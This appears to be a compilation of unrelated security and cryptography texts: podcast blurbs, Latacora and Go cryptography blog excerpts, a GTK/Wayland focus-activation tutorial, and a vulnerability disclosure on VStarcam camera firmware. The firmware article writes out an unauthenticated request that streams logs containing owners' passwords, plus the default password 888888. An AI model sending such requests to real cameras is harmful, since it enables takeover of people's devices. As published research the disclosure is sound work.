One area in which current secure messaging protocols have stalled, however, is the ability to scale secure conversations to groups of dozens, hundreds and even thousands of people. But the IETF’s Messaging Layer Security, or MLS, effort aims to make that happen. Bringing together a collaboration between Wire, Mozilla, Cisco, Facebook, as well as academia, MLS wants to become the TLS of secure messaging, and make it possible to hold secure conversations scaling to thousands of participants.
But what are the real-world implementation risks involved? Are conversations even worth securing when you’ve got hundreds of potential leakers?
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Raphael Robert.
Zero-knowledge proofs have been a notorious research target ever since Zcash and other cryptocurrencies have invented lots of new use cases for them. Range proofs, bullet proofs, you name it – all kinds of zero-knowledge mechanisms have received more and more attention.
But what about using zero-knowledge proofs to prove the existence of a software vulnerability? That way, you can prove that you have a zero-day without risking it getting stolen, putting both vulnerability researchers as well as companies looking to secure their software in a better position!
That’s what Dr. David Archer from Galois is working on, and he joins me today on Cryptography FM to discuss this new interesting use case, and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: David Archer.
The NIST post-quantum competition has started a race for post-quantum cryptography. As a result, we’ve seen a great deal of research into alternative hard mathematical problems to use as a basis for public-key cryptography schemes. Lattice-based cryptography! Error-correcting code based cryptography! And of course, isogeny-based cryptography, have all received enormous renewed interest as a result.
While the NIST post-quantum competition recently announced that it’s favoring candidates founded on lattice-based cryptography, it also encouraged further research into isogeny-based cryptography. But what even is isogeny-based cryptography? Is it as intimidating as it sounds? And what’s keeping it behind on NIST’s list of post-quantum primitives?
Today, it’s my pleasure to be joined by isogeny-based cryptography researchers Luca de Feo and Hart Montgomery, co-authors of a recent publication titled “Cryptographic Group Actions and Applications”, which Luca affectionately described as a “isogeny-based cryptography for dummies” paper. We’ll be discussing isogeny-based cryptography and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Hart Montgomery and Luca De Feo.
Anyone who’s looked at the French civil code -- or, God forbid, the French tax code -- will tell you that it takes more than a mere human mind to decipher its meaning, given how it’s been growing and growing ever since it was established by Napoleon hundreds of years ago.
Well, Catala is a new project that takes this adage perhaps a bit too literally, by applying formal methods -- a field increasingly seen as immediately adjacent to cryptography -- on the French tax code! Catala aims to provide a “domain-specific programming language designed for deriving correct-by-construction implementations from legislative texts.” -- what that means is that you’ll be able to describe the tax code in a programming language, and get a proven-correct processing of your tax returns in that same language, too!
This episode of Cryptography FM is not directly about cryptography. Instead we’ll be covering a highly related and definitely interesting tangent: can we use the same formal methods that have recently proven the security of protocols like Signal and TLS in order to formally verify our tax returns? And, more importantly, can today’s guest help me pay less taxes?!
Joining us today is doctoral student Denis Merigoux, to talk about Catala, and more.
Links:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Denis Merigoux.
Ever since its introduction in 2012, the BLAKE hash function has been reputed for achieving performance matching and even exceeding MD5 while still maintaining a high security margin.
While the original BLAKE did make it as a finalist to the NIST SHA3 competition, Keccak was ultimately selected. But this hasn’t discouraged the BLAKE team, who in January of this year, published BLAKE3, promising to be even faster than BLAKE2 thanks to a highly parallelizable design and fewer rounds.
But wait, what exactly is a parallelizable hash function? Isn't a lower round number risky? And heck, how do you even design a hash function?! Joining me today are two of the four BLAKE3 authors: Jack O’Connor and Jean-Philippe Aumasson, to discuss these questions and more.
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Jack O'Connor and Jean-Philippe Aumasson.
Aside from working on a competition for standardizing post-quantum primitives, the United States National Institute of Standards and Technology, or NIST, has also organized a lightweight cryptography competition meant to attract designs for symmetric primitives, such as hash functions and authenticated encryption ciphers, that work in use cases where even AES is not an adequately speedy standard.
Among the submissions to NIST’s lightweight cryptography competition has been Gimli, a family of cryptographic primitives comprised of a hash function and of an authenticated encryption with associated data (AEAD) cipher. Named after the Lord of the Rings Dwarf warrior and authored by a long list of accomplished cryptographers, Gimli looked like a promising submission -- until a team of cryptanalysts at INRIA produced a surprising set of results outlining some potentially serious weaknesses in Gimli’s current design.
In their paper, which recently was declared as the winner of the IACR Asiacrypt 2020 Best Paper Award, Antonio Flórez Gutiérrez, Gaëtan Leurent, María Naya-Plasencia, Léo Perrin, André Schrottenloher and Ferdinand Sibleyras from the INRIA research institute here in France presented some very strong results against Gimli’s security.
But why does Gimli even matter? Why aren’t AES, ChaCha20-Poly1305, and BLAKE2 enough, even for the most performance-constrained scenarios? And how did this team of researchers succeed in obtaining such serious results on a family of cryptographic primitives that was certainly designed with care and expertise?
Links and papers discussed in the show:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guest: Léo Perrin.
TLS 1.3 has been widely praised as a major upgrade to the Transport Layer Security protocol responsible for securing the majority of Web traffic. But one area in which TLS 1.3 seems to be lacking is its potential for resistance to attacks that utilize quantum computing – computers that, theoretically, could factor the products of large primes and solve the discrete logarithm problem in relatively short periods of time, significantly affecting the security of TLS 1.3.
Today however, we’re discussing an interesting new paper, to be published at this year’s ACM CCS, which introduces KEMTLS: a modified version of TLS 1.3 that uses Key Encapsulation Mechanisms, or KEMs, instead of signatures for server authentication, thereby providing a sort of “post-quantum TLS”.
But what even are KEMs? Are quantum computers even a thing that we should be worried about? On the first ever episode of Cryptography FM, we’ll be hosting Dr. Douglas Stebila and PhD Candidate Thom Wiggers to discuss these questions and more.
Dr. Douglas Stebila is an Associate Professor of cryptography in the Department of Combinatorics & Optimization at the University of Waterloo in Waterloo, Ontario, Canada. His research focuses on improving the security of key exchange protocols and Internet cryptography protocols such as TLS and SSH, including the development of quantum-resistant solutions. His previous work on the integration of elliptic curve cryptography in TLS has been deployed on hundreds of millions of web browsers and servers worldwide.
Thom Wiggers is a PhD Candidate at the Institute of Computing and Information Sciences at Radboud University in The Netherlands. He is working on the interactions of post-quantum cryptography with protocols, under the supervision of Dr. Peter Schwabe, who is also a co-author of the research work that we’re going to discuss today.
Links to discussed papers:
Music composed by Toby Fox and performed by Sean Schafianski.
Special Guests: Douglas Stebila and Thom Wiggers.
In Go, go.mod acts as both manifest and lockfile. There is never a reason to look at go.sum.
We apply a transparency log to a centralized keyserver step-by-step, in less than 500 lines, with privacy protections, anti-poisoning, and witness cosigning.
I delivered my traditional Go Cryptography State of the Union talk at GopherCon US 2025 in New York. It goes into everything that happened at the intersection of Go and cryptography over the last year.
Surprisingly (to me) Claude Code debugged my new ML-DSA implementation faster than I would have, finding the non-obvious low-level issue that was making Verify fail.
Introducing the set of standards that Geomys maintainers strive to uphold in our professional activity as open source maintainers.
Project compromises have common root causes we can mitigate: phishing, control handoff, and unsafe GitHub Actions triggers.
Geomys sometimes acts as a maintainer of last resort for critical Go projects. Recently, we took over the bluemonday HTML sanitizer, and built upgrade paths for the gorilla/csrf library.
Cross-Site Request Forgery countermeasures can be greatly simplified using request metadata provided by modern browsers.
Test coverage of delicate Go cryptographic assembly through a new mutation testing framework.
Encrypting files with passkeys, using the WebAuthn prf extension and the TypeScript age implementation.
We are thrilled to announce a major milestone for Latacora: we have achieved the Amazon Web Services (AWS) Advanced Tier Services Partner status within the AWS Partner Network (APN).
This designation reflects Latacora’s technical expertise and diligence in delivering exceptional cloud security and compliance solutions to our clients, and confirms that we have successfully completed a rigorous validation process demonstrating a proven track record of customer success delivered by a team of AWS-certified professionals with specialized technical capabilities.
Large language models, agents, and Model Context Protocol (MCP) are impossible to escape in today’s tech climate. At Latacora, we take a thoughtful and pragmatic approach towards new technologies like these. Are they going to solve all the world’s problems? No. Is it important that we understand them and be able to build software that integrates into emerging ecosystems? Yes!
Internally we’ve built a MCP server to query our Datomic databases using natural language, but now we’re open sourcing the underlying Clojure library so others can easily build robust MCP servers for the emerging LLM agent ecosystem too.
Update: after years of being on the wish list of a ton of top AWS teams, AWS released a built-in version of this feature about two weeks after we published this. Never let it be said gentle ribbing doesn’t work. Also, thanks AWS! We meant it when we said that the only thing better than having something easy to deploy was not needing to deploy anything at all. Everything in this post about workload identity is still relevant but you should probably use upstream’s implementation unless you have a good reason not to (for example, private validators for whom you need a VPC endpoint).
AWS ECS is a widely-adopted service across industries. To illustrate the scale and ubiquity of this service, over 2.4 billion Amazon Elastic Container Service tasks are launched every week (source) and over 65% of all new AWS containers customers use Amazon ECS (source).
There are two primary launch types for ECS: Fargate and EC2. The choice between them depends on factors like cost, performance, operational overhead, and the variability of your workload.
Security tools are often designed to highlight specific issues by consuming APIs and applying predefined logic. Each tool implements its own data structures, storage formats, and evaluation logic. While effective in narrow contexts, this approach creates challenges for teams managing a diverse toolset. Moreover, most tools are optimized to fetch only the data needed for specific findings, limiting their utility in broader contexts such as incident response or historical analysis.
Security rarely tops the priority list for startups - but that doesn’t make it optional.
Running a startup is no small feat. Facing enormous pressure to address a never-ending list of priorities (finding market fit, fundraising, launching new features, scaling infrastructure, etc.) security often becomes a “later” issue……until it can’t be. Even when companies know they need help, the breadth of the problem can be intimidating. Application security, cloud infrastructure, third-party vendors, compliance, cryptography: any resource-constrained startup will be hard-pressed to find a unicorn hire who can own all these responsibilities equally well.
Every other week, regulators around the world bombard their constituents with new data protection laws and acronyms. As the person who was just voluntold you’re now responsible for privacy at your startup, in addition to all your other duties and without any additional resources, how can you possibly be expected to keep up—let alone contextualize that information to maintain compliance?
Privacy, at its core, is an ethical issue, which means the solution to your privacy challenges is deceptively simple: do the right thing and be transparent with your customers. That’s it. That’s what everyone means when they say “privacy by design.”
This post is the second in a series about logging and audit trails from a security perspective. For the first post in the series, see Lessons in Logging: Chopping Down Security Risks Using Audit Trails
If you’re looking to level up your security practices, logging is a good place to focus your attention. Just as logging is a core pillar of observability, comprehensive audit trails are a core pillar of a strong security program. Logs and audit trails are separate but overlapping concepts, and most companies can improve their security posture by investing in this area.
Latacora collects and analyzes data about services our clients use. You may have read about our approach to building security tooling, but the tl;dr is we make requests to all the (configuration metadata) read-only APIs available to us and store the results in S3. We leverage the data to understand our clients' infrastructure and identify security issues and misconfigurations. We retain the files (“snapshots”) to support future IR/forensics efforts.
This approach has served us well, but the limited scope of a snapshot meant
there was always a problem of first needing to figure out which files to look
at. We love aws s3 sync and grep as much as anyone but security analysis
requires looking for complex relationships between resources; text search is,
at best, only a Bloom filter. What we really wanted was a performant way to ask
any question across all the data we have for a client that would support
complex queries using logic programming.
Exciting news! Latacora is teaming up with Vanta to supercharge your compliance game. We now combine Latacora’s security expertise with Vanta’s compliance platform to help you reach your compliance goals faster than ever. As a Vanta managed service provider (MSP), Latacora can help you tackle your compliance goals quickly and efficiently, freeing you to focus on growing your business and building trust with your customers.
Here’s the scoop on why using Vanta through Latacora is a game-changer:
One of our favorite blog posts is our “crypto right answers” post. It’s intended to be an easy-to-use guide to help engineers pick the best cryptography choices without needing to go too far down a rabbit hole. With post-quantum cryptography (PQC) recently transitioning from an academic research topic to a more practical cryptography concern we figured it’s time for an update of our cryptography recommendations.
One thing that makes recommending PQC challenging is that historically, we’ve been able to provide “better” answers for classical cryptography. Faster and bigger hashes, stronger password KDFs, easier-to-use primitives… These things all have the same fundamental “shape”: you can take an existing design and drop in something else to make it better. MD5 and BLAKE3 are not comparable in strength, but you can just use BLAKE3 in place of MD5 and get something that’s just far better with minimal API changes.
We traveled to Toronto this year to attend RWC 2024. The conference was held in TIFF Lightbox located in the city’s downtown; the venue is the headquarters for the Toronto Film Festival and contains five cinema rooms. RWC is a single-tracked conference and there’s no hard requirement that talks are backed by papers. Each RWC includes the Levchin prize ceremony for major achievements in applied cryptography, several invited talks and the lightning talks session.
When people talk about PBKDFs (Password Based Key Derivation Functions), this is usually either in the context of secure password storage, or in the context of how to derive cryptographic keys from potentially low-entropy passwords. The Password Hashing Competition (PHC, 2013-2015) was an open competition to derive new password hashing algorithms, resulting in Argon2 hash as its winner. Apart from achieving general hash security, many of the candidates focused on achieving resistance to parallel attacks on available hardware such as GPUs.
This post is the first in a series about logging and audit trails from a security perspective. For the next post in the series, see Lessons in Logging, Part 2: Mapping Your Path to a Mature Security Program with Logs and Audit Trails
At Latacora, we bootstrap security practices. We partner with companies that frequently have minimally developed security programs, work with them to figure out the right security practices for their current size, and then help them evolve and scale those practices as their business matures.
Most “security tools” today are typically composed by code that consumes an API and applies predefined logic to identify issues. This is generally accomplished by:
Integrating third party tools into our monitoring platform isn’t always straightforward, as each tool:
The last Strange Loop conference was held September 21-22, 2023 at St. Louis Union Station. The conference is targeted towards developers; the speakers are often sharing their knowledge on new and inventive ways to use technology. At our sponsor booth at Union Station, attendees asked two (okay, three) questions most often:
The first one isn’t hard for the folks from our team: Latacora is a consultancy that bootstraps security for startups. We have a team of experts helping our clients with most security-related things: application security, cloud security, corporate security, compliance, and more. We also have a team of security architects, cryptographers, and project managers supporting our clients. These professionals are equipped with power tools built to make their jobs more efficient and to help our clients improve their security posture.
2024-12-17 Updated to include Declarative Policies
Compute resources in AWS (for example, EC2 instances, ECS tasks/services, etc.) get access to AWS credentials, such as temporary instance role credentials, via the Instance Metadata Service (IMDS). The compute resources use these credentials to access other AWS services such as SQS, DynamoDB and Secrets Manager.
There was originally only one version of IMDS, now called “v1,” which unfortunately many people still use. The technical risks and high profile incidents (the Capital One breach comes to mind) associated with v1, as well as the existence of v2 are well-documented. When an application hosted on an EC2 instance is vulnerable to SSRF, XXE or RCE, attackers can likely steal the temporary AWS credentials of the IAM role configured for the instance. This service is a particularly interesting target for attackers:
So, you plan to sell your startup’s product to big companies one day. Congratu-dolences!
Really, that’s probably the only reason you should care about this article. If that’s not you, go forth and live your life! We’ll ask no more of your time.
For the rest of you: Industry people talk about SOC2 a lot, and it’s taken on a quasi-mystical status, not least because it’s the product of the quasi-mystical accounting industry. But what it all boils down to is: eventually you’ll run into big-company clients demanding a SOC2 report to close a sale. You know this and worry about it.
Email is unsafe and cannot be made safe. The tools we have today to encrypt email are badly flawed. Even if those flaws were fixed, email would remain unsafe. Its problems cannot plausibly be mitigated. Avoid encrypted email.
Technologists hate this argument. Few of them specialize in cryptography or privacy, but all of them are interested in it, and many of them tinker with encrypted email tools.
Most email encryption on the Internet is performative, done as a status signal or show of solidarity. Ordinary people don’t exchange email messages that any powerful adversary would bother to read, and for those people, encrypted email is LARP security. It doesn’t matter whether or not these emails are safe, which is why they’re encrypted so shoddily.
Last year we did a blog post on interservice auth. This post is mostly about authenticating consumers to an API. That’s a related but subtly different problem: you can probably impose more requirements on your internal users than your customers. The idea is the same though: you’re trying to differentiate between a legitimate user and an attacker, usually by getting the legitimate user to prove that they know a credential that the attacker doesn’t.
Cryptography engineers have been tearing their hair out over PGP’s deficiencies for (literally) decades. When other kinds of engineers get wind of this, they’re shocked. PGP is bad? Why do people keep telling me to use PGP? The answer is that they shouldn’t be telling you that, because PGP is bad and needs to go away.
There are, as you’re about to see, lots of problems with PGP. Fortunately, if you’re not morbidly curious, there’s a simple meta-problem with it: it was designed in the 1990s, before serious modern cryptography. No competent crypto engineer would design a system that looked like PGP today, nor tolerate most of its defects in any other design. Serious cryptographers have largely given up on PGP and don’t spend much time publishing on it anymore (with a notable exception). Well-understood problems in PGP have gone unaddressed for over a decade because of this.
(This is an introductory level analysis of a scheme involving RSA. If you’re already comfortable with Bleichenbacher oracles you should skip it.)
Someone pointed me at the following suggestion on the Internet for encrypting secrets to people based on their GitHub SSH keys. I like the idea of making it easier for people to leverage key material and tools they already have. The encryption instructions are:
echo "my secret" > message.txt
curl -q "https://github.com/${USER}.keys" \
| head -n 1 \
> recipient.pub
ssh-keygen -e -m pkcs8 -f recipient.pub > recipient.pem
openssl rsautl \
-encrypt \
-pubin \
-inkey recipient.pem \
-ssl \
-in message.txt \
-out encrypted.txt
Anything using an openssl command line tool makes me a little uncomfortable. Let’s poke at it a little.
The ROCA RSA key generation flaw or ROBOT, the “Return Of Bleichenbacher” attack: which is most deserving of the “Best Cryptographic Attack” Pwnie award at the 2018 Black Hat USA conference? Only one can survive. Let us consider.
Assume for the moment that it’s down to those two: ROBOT and ROCA. But first take a moment to consider the best cases for the “runners up”. They are all excellent; it was a very good year for crypto research.
Update: I don’t know if we can take credit for it or if it’s random chance, but I note OpenSSH changed its default in the release after this blog post. The system works!
The eslint-scope npm package got compromised recently, stealing npm credentials from your home directory. We started running tabletop exercises: what else would you smash-and-grab, and how can we mitigate that risk?
Most people have an RSA SSH key laying around. That SSH key has all sorts of privileges: typically logging into prod and GitHub access. Unlike an npm credential, an SSH key is encrypted, so perhaps it’s safe even if it leaks? Let’s find out!
TL;DR: if I ever told you to use Noise, I probably meant Noise_IK and should have been more specific.
The Noise protocol is one of the best things to happen to encrypted protocol design. WireGuard inherits its elegance from Noise. Noise is a cryptography engineer’s darling spec. It’s important not to get blindsided while fawning over it and to pay attention to where implementers run into trouble. Someone raised a concern I had run into before: Noise has a matrix.
Default shells usually end in $. Unless you’re root and it’s #. That
tradition has been around forever: people recognized the need to highlight
you’re not just some random shmoe.
These days we have lots of snazzy shell magic. You might still su, but you’re more likely to sudo. We still temporarily assume extra privileges. If you have access to more than one set of systems, like production and staging, you probably have ways of putting on a particular hat. Some combination of setting an environment variable, adding a key to ssh-agent, or assuming an AWS role with aws-vault. You know, so you don’t accidentally blow away prod.
Modern applications tend to be composed from relationships between smaller applications. Secure modern applications thus need a way to express and enforce security policies that span multiple services. This is the “server-to-server” (S2S) authentication and authorization problem (for simplicity, I’ll mash both concepts into the term “auth” for most of this post).
Designers today have a lot of options for S2S auth, but there isn’t much clarity about what the options are or why you’d select any of them. Bad decisions sometimes result. What follows is a stab at clearing the question up.
If you’re like me, you think of Google Groups as the Usenet client turned mailing list manager. If you’re a GCP (Google Cloud Platform) user or maybe one of a handful of SAML (Security Assertion Markup Language) users you probably know Google Groups as an access control mechanism. The bad news is we’re both right.
This can blow up if permissions on those groups aren’t set right. Your groups were probably originally created by a sleep-deprived founder way before anyone was worried about access control. It’s been lovingly handcrafted and never audited ever since. Let’s say their configuration is, uh, “inconsistent”. If an administrator adds people to the right groups as part of their on-boarding, it’s not obvious when group membership is secretly self-service. Even if someone can’t join a group, they might still be able to read it.
Amidst the hubbub of the Efail PGP/SMIME debacle yesterday, the WireGuard project made a pretty momentous announcement: a MacOS command line version of the WireGuard VPN is now available for testing, and should stabilize in the coming few months. I’m prepared to be wrong, but I think that for a lot of young tech companies, this might be the biggest thing to happen to remote access in decades.
WireGuard is a modern, streamlined VPN protocol that Jason Donenfeld developed based on Trevor Perrin’s Noise protocol framework. Imagine a VPN with the cryptographic sophistication of Signal Protocol and you’re not far off. Here are the important details:
It’s weird to say this but a significant part of the value we provide clients is filling out Dumb Security Questionnaires (hereafter DSQs, since the only thing more irritating than a questionnaire is spelling “questionnaire”).
Daniel Meiessler complains about DSQs, arguing that self-assessment is an intrinsically flawed concept.
Meh. I have bigger problems with them.
First, most DSQs are terrible. We get on calls with prospective clients, tell them “these DSQs were all first written in the early 1990s and lovingly handed down from generation to generation of midwestern IT secops staff. Oh, how clients laugh and laugh. But, not joking. That’s really how those DSQs got written.
We’re less interested in empowering developers and a lot more pessimistic about the prospects of getting this stuff right.
There are, in the literature and in the most sophisticated modern systems, “better” answers for many of these items. If you’re building for low-footprint embedded systems, you can use STROBE and a sound, modern, authenticated encryption stack entirely out of a single SHA-3-like sponge constructions. You can use NOISE to build a secure transport protocol with its own AKE. Speaking of AKEs, there are, like, 30 different password AKEs you could choose from.
One of the biggest sore points with Wayland is its focus stealing protection. The idea is good: an application should not be able to bring itself into focus at an unexpected time, only when the currently active application allows it. Support is still lacking however, which might also be due to Gtk/Glib implementing the required XDG activation protocol but not really documenting it. It took me a bit of time to figure this out without any public information, this article will hopefully make things easier for other people.
The main idea behind the XDG activation protocol is that focus transfer from one application to another requires consent. With X11 a file manager could just launch the browser for an HTML file and the browser would immediately take focus, even if that browser was already running. With Wayland the file manager has to indicate that the browser is allowed to take focus.
It does that by giving the browser its XDG activation token, typically via XDG_ACTIVATION_TOKEN environment variable. The browser can then use that activation token to prove consent and take focus. For this to work the protocol has to be supported on both ends: the file manager must know how to retrieve an activation token and pass it on via XDG_ACTIVATION_TOKEN environment variable, and the browser has to know how to use that token.
The receiving side has been implemented in Gtk with merge request 7118 and is available starting with Gtk 4.14.6 and 4.15.1. This is the unproblematic part: it is handled automatically and doesn’t require the application developer to change anything.
The sending side has been implemented in Gtk with merge request 3502 and Glib with merge request 3090, so it is available starting with Gtk 4.10.0 and Glib 2.75.1. This is the part which might require some changes to the application – changes that I couldn’t find documented anywhere.
When a Gtk-based file manager wants to open an HTML file, this usually involves Gio.AppInfo and g_app_info_launch or similar:
GAppInfo* app_info = g_app_info_get_default_for_type("text/html", TRUE);
GList *list = NULL;
list = g_list_append(list, "https://example.com/");
GdkDisplay *display = gdk_display_get_default();
GdkAppLaunchContext* context = (display ?
gdk_display_get_app_launch_context(display) :
NULL);
g_app_info_launch_uris(app_info, list, G_APP_LAUNCH_CONTEXT(context), NULL);
g_list_free(list);
This should normally transfer focus to the browser automatically. That app launch context parameter is important however, you cannot omit it. Also, this will only work if the desktop file corresponding to the AppInfo has the StartupNotify key set – the Gtk developers decided to merge the handling of X11 startup notifications and XDG activations.
But what if you are using something like execve function to start applications? You can still set XDG_ACTIVATION_TOKEN environment variable manually. It’s important to know however that the token has to be retrieved via g_app_launch_context_get_startup_notify_id (please pardon my C):
char** extend_env(char** env, char* value)
{
int env_size = 0;
while (env[env_size])
env_size++;
char **new_env = malloc((env_size + 2) * sizeof(char*));
memcpy(new_env, env, env_size * sizeof(char*));
new_env[env_size++] = value;
new_env[env_size++] = NULL;
return new_env;
}
char *argv[] = {"/usr/bin/firefox", "https://example.com/", NULL};
char *default_env[] = {NULL};
char **env = default_env;
bool should_free_env = FALSE;
GdkDisplay *display = gdk_display_get_default();
if (display)
{
GdkAppLaunchContext* context = gdk_display_get_app_launch_context(display);
env = g_app_launch_context_get_environment(G_APP_LAUNCH_CONTEXT(context));
char* sn_id = g_app_launch_context_get_startup_notify_id(
G_APP_LAUNCH_CONTEXT(context), NULL, NULL);
if (sn_id)
{
char token_var[256];
snprintf(token_var, sizeof(token_var), "XDG_ACTIVATION_TOKEN=%s", sn_id);
env = extend_env(env, token_var);
should_free_env = TRUE;
}
}
if (!fork())
execve(argv[0], argv, env);
if (should_free_env)
free(env);
As before, it’s worth noting that Gtk developers decided to merge the handling of X11 startup notifications and XDG activations, hence the function name to retrieve the token. The last two parameters of g_app_launch_context_get_startup_notify_id are unused for Wayland, these are only relevant for X11 startup notifications. If you pass in an AppInfo instance here you might actually get an X11 notification ID back that you should write into the DESKTOP_STARTUP_ID environment variable. However, if you have an AppInfo instance it should be easier to use one of its launch functions as described above, these will do it automatically.
VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like… well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password.
So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customer’s passwords.
A reminder: “P2P” functionality based on the PPPP protocol means that these cameras will always communicate with and be accessible from the internet, even when located on a home network behind NAT. Short of installing a custom firmware this can only addressed by configuring the network firewall to deny internet access.
Not every VStarcam camera has “VStarcam” printed on the side. I have seen reports of VStarcam cameras being sold under the brand names Besder, MVPower, AOMG, OUSKI, and there are probably more.
Most cameras should be recognizable by the app used to manage them. Any camera managed by one of these apps should be a VStarcam camera: Eye4, EyeCloud, FEC Smart Home, HOTKam, O-KAM Pro, PnPCam, VeePai, VeeRecon, Veesky, VKAM, VsCam, VStarcam Ultra.
VStarcam cameras have a mechanism to deliver firmware updates (LookCam cameras prove that this shouldn’t be taken for granted). The app managing the camera will request update information from an address like http://api4.eye4.cn:808/firmware/1.2.3.4/EN where 1.2.3.4 is the firmware version. If a firmware update is available the response will contain a download server and a download path. The app sends these to the device which then downloads and installs the updated firmware.
Both requests are performed over plain HTTP and this is already the first issue. If an attacker can produce a manipulated response either on the network that the app or the device are connected to they will be able to install a malicious update on the camera. The former is particularly problematic, as the camera owner may connect to an open WiFi or similarly untrusted networks while being out.
The last part of a firmware version is a build number which is ignored for the update requests. The first part is a vendor ID where only a few options seem relevant (I checked 10, 48 and 66). The rest of the version number can be easily enumerated. Many firmware branches don’t have an active update, and when they do some updates won’t download because the servers in question appear no longer operational. Still, I found 380 updates this way.
I managed to unpack all but one of these updates. Firmware version 10.1.110.2 wasn’t for a camera but rather some device with an HDMI connector and without any P2P functionality – probably a Network Video Recorder (NVR). Firmware version 10.121.160.42 wasn’t using PPPP but something called NHEP2P and an entirely different application-level protocol. Ten updates weren’t updating the camera application but only the base system. This left 367 firmware versions for this investigation.
I do not own any VStarcam hardware, nor would it be feasible to investigate hundreds of different firmware versions with real hardware. The results of this article are based solely on reverse engineering, emulation, and automated analysis via running Ghidra in headless mode. While I can easily emulate a PPPP server, doing the same for the VStarcam cloud infrastructure isn’t possible, I simply don’t know how it behaves. Similarly, the firmware’s interaction with hardware had to be left out of the emulation. While I’m still quite confident in my results, these limitations could introduce errors.
More importantly, there are only so many firmware versions that I checked manually. Most of them were checked automatically, and I typically only looked at a few lines of decompiled code that my scripts extracted. There is potential for false negatives here, I expect that there are more issues with VStarcam firmware than what’s listed here.
When an app communicates with a camera, it sends commands like GET /check_user.cgi?loginuse=admin&loginpas=888888&user=admin&pwd=888888. Despite the looks of it, these aren’t HTTP requests passed on to a web server. Instead, the firmware handles these in function P2pCgiParamFunction which doesn’t even attempt to parse the request. The processing code looks for substrings like check_user.cgi to identify the command (yes, you better don’t set check_user.cgi as your access password). Parameter extraction works via similar substring matching.
It’s worth noting that these cameras have a very peculiar authentication system which VStarcam calls “dual authentication.” Here is how the Eye4 application describes it:
The dual authentication mechanism is a measure to upgrade the whole system security
- The device will double check the identity of the visitor and does not support the old version of app.
- Considering the security risk of possible leakage, the plaintext password mode of the device was turned off and ciphertext access was used.
- After the device is added for the first time, it will not be allowed to be added for a second time, and it will be shared by the person who has added it.
I’m not saying that this description is utter bullshit but there is a considerable mismatch with the reality that I can observe. The VStarcam firmware cannot accept anything other than plaintext passwords. Newer firmware versions employ obfuscation on the PPPP-level but this hardly deserves the name “ciphertext”.
What I can see is: once a device is enrolled into dual authentication, the authentication is handled by function GetUserPri_doubleVerify rather than GetUserPri. There isn’t a big difference between the two, both will try the credentials from the loginuse/loginpas parameters and fall back to the user/pwd credentials pair. Function GetUserPri_doubleVerify merely checks a different password.
From the applications I get the impression that the dual authentication password is automatically generated and probably not even shared with the user but stored in their cloud account. This is an improvement over the regular password that defaults to 888888 and allowed these cameras to be enrolled into a botnet. But it’s still a plaintext password used for authentication.
There is a second aspect to dual authentication. When dual authentication is used, the app is supposed to make a second authentication call to eye4_authentication.cgi. The loginAccount and loginToken parameters here appear to belong to the user’s cloud account, apparently meant to make sure that only the right user can access a device.
Yet in many firmware versions I’ve seen the eye4_authentication.cgi request always succeeds. The function meant to perform a web request is simply hardcoded to return the success code 200. Other firmware versions actually make a request to https://verification.eye4.cn, yet this server also seems to produce a 200 response regardless of what parameters I try. It seems that VStarcam never made this feature work the way they intended it.
None of this stopped VStarcam from boasting on their website merely a year ago:
You can certainly count on anything saying “financial grade encryption” being bullshit. I have no idea where AES comes into the picture here, I haven’t seen it being used anywhere. Maybe it’s their way of saying “we use TLS when connecting to our cloud infrastructure.”
A reasonable approach to authentication is: authentication is required before any requests unrelated to authentication can be made. This is not the approach taken by VStarcam firmware. Instead, some firmware versions decide for each endpoint individually whether authentication is necessary. Other versions put a bunch of endpoints outside of the code enforcing authentication.
The calls explicitly excluded from authentication differ by firmware version but are for example: get_online_log.cgi, show_prodhwfg.cgi, ircut_test.cgi, clear_log.cgi, alexa_ctrl.cgi, server_auth.cgi. For most of these it isn’t obvious why they should be accessible to unauthenticated users. But get_online_log.cgi caught my attention in particular.
So a request like GET /get_online_log.cgi?enable=1 can be sent to a camera without any authentication. This isn’t a request that any of the VStarcam apps seem to support, what does it do?
Despite the name this isn’t a download request, it rather sets a flag for the current connection. The logic behind this involves many moving parts including a Linux kernel module but the essence is this: whenever the application logs something via LogSystem_WriteLog function, the application won’t merely print that to stderr and write it to the log file on the SD card but also send it to any connection that has this flag set.
What does the application log? Lots and lots of stuff. On average, VStarcam firmware has around 1500 such logging calls. For example, it could log security tokens:
LogSystem_WriteLog("qiniu.c", "upload_qiniu", 497, 0,
"upload_qiniu*** filename = %s, fileid = %s, uptoken = %s\n", …);
LogSystem_WriteLog("pushservice.c", "parsePushServerRequest_cjson", 5281, 1,
"address=%s token =%s master= %d timestamp = %d", …);
LogSystem_WriteLog("queue.c", "CloudUp_Manage_Pth", 347, 2,
"token=%s", …);
It could log cloud server responses:
LogSystem_WriteLog("pushservice.c", "curlPostMqttAuthCb", 4407, 3,
"\n\nrspBuf = %s\n", …);
LogSystem_WriteLog("post/postFileToCloud.c", "curl_post_file_cb", 74, 0,
"\n\nrspBuf = %s\n", …);
LogSystem_WriteLog("pushserver.c", "curl_Eye4Authentication_write_data_cb", 2822, 0,
"rspBuf = %s", …);
And of course it will log the requests coming in via PPPP:
LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0,
"sit %d, pcmd: %s", …);
Reminder: these requests contain the authentication password as parameter. So an attacker can connect to a vulnerable device, request logs and wait for the legitimate device owner to connect. Once they do their password will show up in the logs – voila, the attacker has access now.
VStarcam appears to be at least somewhat aware of this issue because some firmware versions contain code “censoring” password parameters prior to logging:
memcpy(pcmd, request, sizeof(pcmd));
char* pos = strstr(pcmd, "loginuse");
if (pos)
*pos = 0;
LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0,
"sit %d, pcmd: %s", sit, pcmd);
But that’s only the beginning of the story of course.
